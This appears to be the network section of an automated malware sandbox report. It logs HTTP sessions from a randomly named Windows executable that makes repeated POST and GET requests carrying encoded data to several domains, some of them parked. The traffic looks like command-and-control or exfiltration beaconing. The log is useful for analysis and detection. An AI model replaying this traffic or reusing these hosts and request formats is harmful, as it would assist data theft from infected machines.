                    Data Ascii: ce6<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber k&ouml;nnen Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitungen e
                    Aug 12, 2024 05:16:01.197151899 CEST1236INData Raw: 69 6e 72 69 63 68 74 65 6e 2c 20 57 65 62 68 6f 73 74 69 6e 67 20 62 65 73 74 65 6c 6c 65 6e 20 75 6e 64 20 56 69 65 6c 65 73 20 6d 65 68 72 2e 3c 62 72 20 2f 3e 45 62 65 6e 73 6f 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 6f 6e 6c 69 6e
                    Data Ascii: inrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso k&ouml;nnen Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes"><table><tr><td><table><tr
                    Aug 12, 2024 05:16:01.197191000 CEST1108INData Raw: 6e 3d 22 32 22 3e 3c 68 32 3e 54 79 70 6f 20 33 20 43 4d 53 20 48 6f 73 74 69 6e 67 3c 2f 68 32 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63
                    Data Ascii: n="2"><h2>Typo 3 CMS Hosting</h2></td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;" src="https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/typo3-2.png" alt="Typo3" /></td><td style="width:300px;">Typ
                    Aug 12, 2024 05:16:01.200086117 CEST5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    28192.168.2.449767213.145.228.16802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:16:03.025938988 CEST502OUTGET /aroo/?ZH3=yf1H3v6h&YXDT=bKy7FSIHmKYFjPoOU8uZGqQpeblpEQl2twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGH0ELwMgy3j7Qb0m6Rmga/hvJBmgScr7TS3s= HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Host: www.sandranoll.com
                    Connection: close
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Aug 12, 2024 05:16:04.076773882 CEST1236INHTTP/1.1 404 Not Found
                    Date: Mon, 12 Aug 2024 03:16:03 GMT
                    Server: Apache/2.4.61 (Debian)
                    X-Powered-By: PHP/7.4.33
                    Strict-Transport-Security: max-age=63072000; preload
                    Connection: Upgrade, close
                    Transfer-Encoding: chunked
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 64 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 [TRUNCATED]
                    Data Ascii: d1d<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber k&ouml;nnen Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitungen e
                    Aug 12, 2024 05:16:04.076831102 CEST1236INData Raw: 69 6e 72 69 63 68 74 65 6e 2c 20 57 65 62 68 6f 73 74 69 6e 67 20 62 65 73 74 65 6c 6c 65 6e 20 75 6e 64 20 56 69 65 6c 65 73 20 6d 65 68 72 2e 3c 62 72 20 2f 3e 45 62 65 6e 73 6f 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 6f 6e 6c 69 6e
                    Data Ascii: inrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso k&ouml;nnen Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes"><table><tr><td><table><tr
                    Aug 12, 2024 05:16:04.076870918 CEST1163INData Raw: 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 22 3e 3c 69 6d 67 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64
                    Data Ascii: le="width:100px;text-align:center;"><img style="display:block;" src="https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/redirect.png" alt="Reseller" /></td><td style="width:300px;">Als Web Hosting und Domain Reseller nutzen Sie unsere L
                    Aug 12, 2024 05:16:04.079963923 CEST5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    29192.168.2.44976891.195.240.19802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:16:09.142751932 CEST774OUTPOST /tf44/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Accept-Encoding: gzip, deflate, br
                    Host: www.gipsytroya.com
                    Origin: http://www.gipsytroya.com
                    Cache-Control: max-age=0
                    Connection: close
                    Content-Type: application/x-www-form-urlencoded
                    Content-Length: 201
                    Referer: http://www.gipsytroya.com/tf44/
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Data Raw: 59 58 44 54 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 37 6c 2f 32 47 70 41 55 34 73 54 41 75 68 36 59 41 37 77 46 6f 6e 4a 54 76 38 6f 59 51 47 65 36 58 43 4e 4e 6b 34 4e 58 4a 33 32 59 45 4b 4d 36 46 57 54 69 64 68 43 34 58 4d 64 47 76 2f 5a 77 37 68 6b 37 35 49 2f 4b 32 76 76 7a 45 65 59 46 42 35 6e 51 48 78 4b 50 6c 45 41 36 45 31 69 30 66 32 4e 66 48 69 53 49 71 44 59 58 38 63 69 4f 48 6a 2f 36 52 54 61 53 64 39 67 67 42 54 30 71 4f 39 56 4d 6d 73 31 39 66 64 4a 43 58 38 67 39 68 72 75 63 50 72 33 51 6f 75 6c 75 53 52 53 43 32 72 47 68 71 41 71 43 46 56 67 67 6c 37 78 72 47 6b 34 65 41 67 3d 3d
                    Data Ascii: YXDT=+FKgbPBnyVok7l/2GpAU4sTAuh6YA7wFonJTv8oYQGe6XCNNk4NXJ32YEKM6FWTidhC4XMdGv/Zw7hk75I/K2vvzEeYFB5nQHxKPlEA6E1i0f2NfHiSIqDYX8ciOHj/6RTaSd9ggBT0qO9VMms19fdJCX8g9hrucPr3QouluSRSC2rGhqAqCFVggl7xrGk4eAg==
                    Aug 12, 2024 05:16:09.777957916 CEST707INHTTP/1.1 405 Not Allowed
                    date: Mon, 12 Aug 2024 03:16:09 GMT
                    content-type: text/html
                    content-length: 556
                    server: Parking/1.0
                    connection: close
                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    30192.168.2.44976991.195.240.19802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:16:11.686892986 CEST794OUTPOST /tf44/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Accept-Encoding: gzip, deflate, br
                    Host: www.gipsytroya.com
                    Origin: http://www.gipsytroya.com
                    Cache-Control: max-age=0
                    Connection: close
                    Content-Type: application/x-www-form-urlencoded
                    Content-Length: 221
                    Referer: http://www.gipsytroya.com/tf44/
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Data Raw: 59 58 44 54 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 36 45 76 32 45 4b 34 55 2f 4d 54 48 72 68 36 59 57 4c 77 42 6f 6e 56 54 76 35 46 46 58 31 71 36 58 69 39 4e 6c 35 4e 58 4b 33 32 59 63 36 4d 46 4c 32 54 70 64 68 4f 77 58 4a 39 47 76 2f 39 77 37 6c 67 37 35 2f 44 4a 33 2f 76 39 64 4f 59 48 63 70 6e 51 48 78 4b 50 6c 45 6c 76 45 7a 4b 30 66 69 4a 66 57 32 47 4c 6d 6a 59 57 35 73 69 4f 57 7a 2f 2b 52 54 61 67 64 2f 46 46 42 52 38 71 4f 38 6c 4d 6e 39 31 2b 57 64 4a 45 61 63 68 4a 6f 5a 72 33 47 71 2b 61 6d 39 78 4b 64 69 2b 63 36 4e 58 37 37 78 4c 56 58 56 45 54 34 38 34 66 4c 6e 46 58 62 6b 76 46 64 6f 5a 2b 54 33 4d 4c 36 57 4d 37 49 30 70 49 4a 4a 77 3d
                    Data Ascii: YXDT=+FKgbPBnyVok6Ev2EK4U/MTHrh6YWLwBonVTv5FFX1q6Xi9Nl5NXK32Yc6MFL2TpdhOwXJ9Gv/9w7lg75/DJ3/v9dOYHcpnQHxKPlElvEzK0fiJfW2GLmjYW5siOWz/+RTagd/FFBR8qO8lMn91+WdJEachJoZr3Gq+am9xKdi+c6NX77xLVXVET484fLnFXbkvFdoZ+T3ML6WM7I0pIJJw=
                    Aug 12, 2024 05:16:12.319983959 CEST707INHTTP/1.1 405 Not Allowed
                    date: Mon, 12 Aug 2024 03:16:12 GMT
                    content-type: text/html
                    content-length: 556
                    server: Parking/1.0
                    connection: close
                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    31192.168.2.44977091.195.240.19802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:16:14.222965002 CEST10876OUTPOST /tf44/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Accept-Encoding: gzip, deflate, br
                    Host: www.gipsytroya.com
                    Origin: http://www.gipsytroya.com
                    Cache-Control: max-age=0
                    Connection: close
                    Content-Type: application/x-www-form-urlencoded
                    Content-Length: 10301
                    Referer: http://www.gipsytroya.com/tf44/
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Data Raw: 59 58 44 54 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 36 45 76 32 45 4b 34 55 2f 4d 54 48 72 68 36 59 57 4c 77 42 6f 6e 56 54 76 35 46 46 58 30 53 36 58 78 31 4e 6b 61 56 58 4c 33 32 59 43 4b 4d 45 4c 32 54 30 64 6c 69 4b 58 4a 35 57 76 39 31 77 36 47 34 37 2f 4f 44 4a 2b 2f 76 39 41 65 59 47 42 35 6d 4b 48 77 36 31 6c 45 31 76 45 7a 4b 30 66 6a 35 66 57 69 53 4c 6b 6a 59 58 38 63 69 43 48 6a 2f 57 52 51 72 56 64 2f 42 2f 43 69 45 71 4f 63 31 4d 6c 50 74 2b 64 64 4a 47 4a 73 68 52 6f 59 58 6f 47 75 57 34 6d 38 31 30 64 68 69 63 72 4d 72 69 6d 54 44 42 4e 31 4e 4f 72 64 49 70 50 56 39 57 65 48 7a 46 51 64 46 59 47 57 77 64 30 32 39 7a 53 52 39 4a 63 4a 32 2b 37 41 38 69 6d 54 53 4a 6e 47 4d 59 56 30 2f 65 76 49 79 58 6d 37 6e 4d 54 39 6c 50 76 5a 39 65 5a 38 4c 75 4d 43 6d 59 36 4b 30 57 55 33 58 31 33 71 79 73 43 61 45 46 2f 34 76 59 78 72 41 49 64 59 31 6c 4f 56 52 48 31 4f 48 49 54 4c 44 34 61 4a 5a 6e 46 6b 4e 59 36 4a 52 73 63 52 67 71 6f 45 30 4b 48 41 77 36 6d 49 4c 31 47 6c 30 79 44 47 54 4b 76 [TRUNCATED]
                    Data Ascii: YXDT=+FKgbPBnyVok6Ev2EK4U/MTHrh6YWLwBonVTv5FFX0S6Xx1NkaVXL32YCKMEL2T0dliKXJ5Wv91w6G47/ODJ+/v9AeYGB5mKHw61lE1vEzK0fj5fWiSLkjYX8ciCHj/WRQrVd/B/CiEqOc1MlPt+ddJGJshRoYXoGuW4m810dhicrMrimTDBN1NOrdIpPV9WeHzFQdFYGWwd029zSR9JcJ2+7A8imTSJnGMYV0/evIyXm7nMT9lPvZ9eZ8LuMCmY6K0WU3X13qysCaEF/4vYxrAIdY1lOVRH1OHITLD4aJZnFkNY6JRscRgqoE0KHAw6mIL1Gl0yDGTKvVgTBRnEyILfJ7GonCuCHn8OczepwOWW7WbCsvI3gPJK4ogHgBbZoMNFyBJVZy51HmU5chAg6EaSOauaR5X8Y4vO4FxKMAh1kY4l5OeInFjFhRwDC7LVRKQtaJzhs4rM7axpX6La/OZCaQ/LFXneh5VUIZ1YEJMNdRKVUxCXnv/u/uswFS0L5N8X8FfdMW9Sm9hWCOiXy7WD7/E/IiJRHXNvWECeH8mBZQmk+fMvwltu5m4bKWfqWdZIWeqQGFz+9BOLI4Cy8ArfItxOk9qtVhZ9h+yp7S4RRRW4PXlhWNNSXfmQfq9L3il3dUMME9CIdEW945wdRoTcd1bPINPriv7nYtjl6m1WuZhrqzkDXlNPiHkvr4jNim86EYR9EEyigX/0pJF7J/2zfvRMrlsWPMm7ar0/LLAAoHF6MQ3OszwGhEA7IyGYR7SPN5iP0fRV54d/KBxfLBWahuh+B/P0HEDYcKaMUUHBrcDcS1Y6ZGjd6i0jIuTa94bnexK2eFKcjKSJl52ZGlKK1NP9MhA5cipobQs1HOeFJonxDbx/OC2w8BbOAU5YQltez3Nl59P5iP14ReIbUtABDOlYPILTgLBe0ECeScv78RD6vjmuxXxmdsZX32ccwlqZ6MU0hHVV1Z6MHPYIlrHG9MnOS/njgIAAxKeXsw6N4VY [TRUNCATED]
                    Aug 12, 2024 05:16:14.881951094 CEST707INHTTP/1.1 405 Not Allowed
                    date: Mon, 12 Aug 2024 03:16:14 GMT
                    content-type: text/html
                    content-length: 556
                    server: Parking/1.0
                    connection: close
                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    32192.168.2.44977191.195.240.19802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:16:16.760590076 CEST502OUTGET /tf44/?YXDT=zHiAY6EG+HxIxFu9b4tfleXF6yb9aKgM+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciywdLjC/RTAaKLEzmduXRfLlKkNxNmYFq4qCQ=&ZH3=yf1H3v6h HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Host: www.gipsytroya.com
                    Connection: close
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Aug 12, 2024 05:16:17.398683071 CEST113INHTTP/1.1 439
                    date: Mon, 12 Aug 2024 03:16:17 GMT
                    content-length: 0
                    server: Parking/1.0
                    connection: close


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    33192.168.2.449772194.58.112.174802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:16:22.525908947 CEST789OUTPOST /mooq/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Accept-Encoding: gzip, deflate, br
                    Host: www.helpers-lion.online
                    Origin: http://www.helpers-lion.online
                    Cache-Control: max-age=0
                    Connection: close
                    Content-Type: application/x-www-form-urlencoded
                    Content-Length: 201
                    Referer: http://www.helpers-lion.online/mooq/
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Data Raw: 59 58 44 54 3d 33 41 52 4a 70 41 4f 43 46 54 64 57 33 52 42 38 33 49 62 4b 43 6f 51 66 34 6b 2f 52 64 68 69 31 57 79 69 69 30 73 54 56 46 56 2f 4c 66 58 36 68 4a 69 54 4e 38 41 56 6d 75 53 62 39 4f 61 33 48 72 48 4d 52 51 6a 63 45 44 76 62 36 48 52 49 34 67 43 49 6a 6e 4e 63 6a 52 47 45 6d 35 33 56 71 68 43 75 77 46 6d 62 4e 68 41 74 45 54 2f 77 4a 47 6e 61 37 59 38 58 33 6e 4e 7a 44 6c 67 6d 39 4f 45 64 41 49 2f 36 55 7a 56 52 61 74 4e 68 4f 34 71 4b 45 6d 78 30 4c 6f 41 37 75 41 46 71 72 44 6b 62 4d 66 71 58 32 51 5a 2b 4c 74 72 59 69 4a 56 42 74 62 61 4e 51 76 6c 72 33 4d 43 6f 41 73 51 3d 3d
                    Data Ascii: YXDT=3ARJpAOCFTdW3RB83IbKCoQf4k/Rdhi1Wyii0sTVFV/LfX6hJiTN8AVmuSb9Oa3HrHMRQjcEDvb6HRI4gCIjnNcjRGEm53VqhCuwFmbNhAtET/wJGna7Y8X3nNzDlgm9OEdAI/6UzVRatNhO4qKEmx0LoA7uAFqrDkbMfqX2QZ+LtrYiJVBtbaNQvlr3MCoAsQ==
                    Aug 12, 2024 05:16:23.205086946 CEST1236INHTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Mon, 12 Aug 2024 03:16:23 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    Content-Encoding: gzip
                    Data Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba [TRUNCATED]
